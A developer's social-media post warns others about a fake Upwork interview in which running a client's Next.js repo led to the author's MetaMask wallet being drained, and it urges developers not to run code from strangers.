Recently, I received an invitation for interview onregarding a job post: upwork.com/jobs/~01fb0cb0 As mentioned in the job post, it's an ongoing project. So, as usual, the client sent me the repo of the project: bitbucket.org/juandsuareza/m And, sent me a screen-recording (drive.google.com/file/d/1uLLOF5) pointing-out to the bug/issue in the existing project, and asked me whether I'm also facing the same after running the project locally. As, you can see, the repo doesn't look suspicious at all (especially in the eyes of regular devs). So, I cloned the repo and started executing it locally. Once, it started running on localhost, it was opening like a normal Next.js app on browser. Trust me, everything was completely unsuspicious. However, here comes the twist, all of a sudden, it started asking for permissions of accessing browser cache, notes, reminders and what not. And to be very honest, i denied all of them as it started looking a lot suspicious all of a sudden. And I closed and deleted the project completely. Suddenly checked my bank accounts and all using my phone via dedicated banking apps (as I never access any of my bank account via browser or laptop). But then, when I checked my Metamask, all of my funds on all the mainnet accounts were gone. Luckily, I was/am not holding any crypto for investment purposes or so, whatever was there of around $60 was for various testing purposes, mainly in Polygon MATIC. These were the transactions that happened: polygonscan.com/tx/0xf0b72d445 etherscan.io/tx/0x44ce9e9a0 Funny enough, in the second transaction, you guys can see the scammer has spent around $4 in transaction fees to transfer $1 worth of Ethereum. Clearly, not an expert scammer for sure! So, the entire motive to quote this incident is to alert all of my fellow #developers and advice them to be safe in terms of never executing any project/code provided by any stranger no matter how safe it looks. I would also like to encourage the #web3security experts like,,,,, etc. to even push harder in spreading more & more awareness regarding the best practices and measures to take, and how to safeguard ourselves against such out-of-bounds & out-of-leagues #scams.